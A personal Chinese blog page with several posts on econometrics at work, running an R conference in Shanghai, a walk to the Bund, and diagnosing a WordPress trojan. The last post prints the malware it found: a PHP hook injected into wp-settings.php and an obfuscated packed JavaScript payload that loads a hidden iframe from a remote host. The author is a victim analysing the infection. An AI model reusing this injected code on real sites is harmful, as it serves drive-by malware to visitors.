落园专注经济视角下的互联网 / Economic Observation of the Internet

原来学计量的时候，喜欢嘲笑计量自以为是的“因果关系”，一致性毕竟只是数据上表达出来的统计标准，到底是不是因果关心还有待考量。可见，对于科学，多少还是心存敬畏的。

工作之后，先是感慨底线一而再、再而三的降低，后则是各种无奈。比如想回答一个问题，是不是“X导致了Y”，明明有很好的计量方法可以去用，结果无奈的只能一次次的按照一种“普通青年能理解的思路”用最简单的分类统计去做，然后什么“显著性检验”之类的都算作浮云了。这个时候再自嘲，自己都不愿意看着自己算出来的结果说事儿了。唉，更加怀念当年手动推$p\lim (\hat{\beta}) = \beta$的日子咯。

有的时候，真的不知道应该怎么办才好。原来也是比较喜欢画图的，后来觉得很多时候画图是一种不负责任的在误导，就越来越少的画图了。久而久之，对于图形的直觉就越来越差了。很多时候，也不知道怎么办好，就那么安静的坐在那里，看窗外云卷云舒……

有的时候，或许不知道，心情会更好一点吧。曾经沧海，才知道难为水有多么的难！

抑或许，我犯的最大错误，就是太顺从、太软了。或许，以后应该更多的stand out，亮出自己的声音！

Posted by Liyun

刚刚结束的一周大概是最近最充实的一周了，几乎每天都在外面跑——去杭州就不用说了，周五更是一天之内横穿了上海两次+，各种高铁地铁磁悬浮、公（交）车私（家）车出租车……真的是为上海的经济发展和碳排放量增加做出了杰出贡献啊！同样的，肯定睡眠不足，终于知道每天都是最终脑子不转了躺在床上立马入睡的感觉，居然被看出来面色憔悴……嗯，我还是喜欢解释为一种挑战极限的充实感。前一周，我被养的太舒服了，果然，这周就必然的加倍还回去。

忙碌的最主要原因就是今天刚刚落下帷幕的第四届中国R语言会议（上海会场）。正如前几日发出来的上海会场演讲列表，见到了很多朋友，老朋友新朋友，各种兴奋！很多人都是自从09年第二届R会议之后就没有见过了。想念已久啊！

终于也体会到办会议的辛苦，很多细节的事儿都需要考虑到，比如最后还是忘记了很多人要的邀请信……汗，如果谁需要的话给我留个言或者发个email，我们会发扫描件补上、或者快递原件的。这个真的是抱歉了。

学术界的话，谢邦昌老师、超级长的VGAM包的作者Thomas Yee、周涛教授，当然还有汤老师的一如既往的支持，都是让我们特别感动的。此外，赵明和钟春燕带来的在基因富集分析和肿瘤生存预测中的应用也让人印象深刻。

COS自己人就不用废话什么了，一群干将北京杀过来镇场子，金融的数据挖掘的，还有“熹云轩”强大的可视化（这个，云被涛代了，果然有“奸情”啊）。

业界的，自然淘宝和茂源资本的加入让我们格外开心，也要感谢土豆、茂源和芒果的赞助～要不我们不可能把这次会议办的这么红红火火气势昂然的。资深潜水员牟官迅和资深开发者邵凡的报告都让我们一下子站到了数据分析的最前沿。

其他的各种感动就不再一一列举了，我是抽空还打了个酱油折磨了大家耳膜20分钟，罪过啊。slides还是厚脸皮传上来先，很快搜集齐了大家的slides都会一并放在COS主站的。

slides_network_experiments_R

Posted by Liyun

我昨天在恍然意识到，原来我从来没有去过上海的外滩……总觉得看了很多照片，很多人都会在上海的某条河旁边背靠着晕耸入天的东方明珠拍照留念，我也始终没有意识到原来那里就是闻名遐迩的外滩和黄浦江。呃。

其实这也不能完全怪我，第一次来上海的时候正逢外滩整修（部分当年的照片：与R有关的那些趣事儿（上海篇）），所以就算我费尽艰辛走到外滩附近，也没有看到外滩真貌的荣幸。而昨日，在静安寺旁边的惬意咖啡厅拜别了两位“老友”（哈哈，不是认识的时间长，而是年龄悬殊大，嘻嘻），就一个人沿着南京西路一直向东，试图抓住几丝老上海的气息。

一路走来倒是不远，只是觉得那么多摩天大厦彻底破坏了上海的视觉风景。偶有一栋两栋古典的建筑，也不可避免的淹没在其他现代化高楼的背影之中。顿感惋惜。唯有站在外滩向西回首，还能稍稍感觉几分古老的味道。难得。

这个周末，多多少少才算得上自上次拜访上海博物馆之后再游上海。静安寺居然要交香火钱，翻了翻钱包只有卡没有现金，伤不起啊～好在静安寺后面有个刘长胜故居，还是免费的，这让我多少心理平衡了好多。最爱免费！上海一直是个有点“人情冷漠”的城市，这让我多多少少一直觉得不爽。是啊，虽然要保护自己，但是也不用这么淡然吧。一路走过去，南京西路两遍的豪华大商场、还有那些倚仗着落地窗炫耀自己的奢侈品牌一点都吸引不了我的兴趣。顿时有一种毓彩流溢却与己无关的淡漠感。

这周末，大概算得上有点“奢侈”的难得享受。手里一堆积攒的事情，然后还是很“不负责任”的去看了场电影、和闺蜜雨中漫步，各种爽朗的甜蜜。不过话说回来，真的是因为平时太忙碌，还是已经失去了一种欣赏美丽的心情？一阵落雨都让我不禁感慨“秋雨细如愁”，又怎么及的上“闲挂小银钩”哪怕万分之一？

Posted by Liyun

最近两个blog都不消停，总有木马嵌入的报告。是可忍孰不可忍，在今早收到google Webmaster的通知之后，决定彻底的查一下这个感染的原因。

登上FTP，看到wp-settings.php这个文件更新日期和其他的都不一样，就下下他来。然后和标准的安装包自带的wp-settings.php进行比对，果然发现多了这么几行：
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');

遂加了一行echo $t_d. '/wp_inc' ;，华丽丽的发现输出了一个/tmp。这个时候访问blog并查看源文件，发现有一行代码被嵌入：
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hggf|navigator|ai|showthread|php|72241732'.split('|'),0,{}))
// ]]>
这就是一切祸首的来源！

总结一下，这个木马的入侵模式为：修改wp-settings.php文件，然后调用系统临时文件夹/tmp下的wp_inc文件，然后嵌入到网站的里面，实现JS入侵。

最简单的屏蔽办法自然是覆盖wp-settings.php文件，然后这行代码的嵌入果然消失了，网站也就没问题了。然而最大的问题则是，服务器已经被感染了，他会不断的重写wp-settings.php文件，而且就算我把文件的权限设为600（只读）而不是644也无济于事。这下子，我也不知道应该怎么办了……看了一下google的report，貌似整个服务器上有很多网站都中招了，汗。

Of the 168165 site(s) we tested on this network over the past 90 days, 4491 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

莫非要换服务器了？……又是一年搬家时？
p.s. 发现自己向着下列目标在不懈努力：

上得了厅堂，下得了厨房，写得了代码，查得出异常，杀得了木马，翻得了围墙，开得起好车，买得起新房，斗得过二奶，打得过流氓.

Posted by Liyun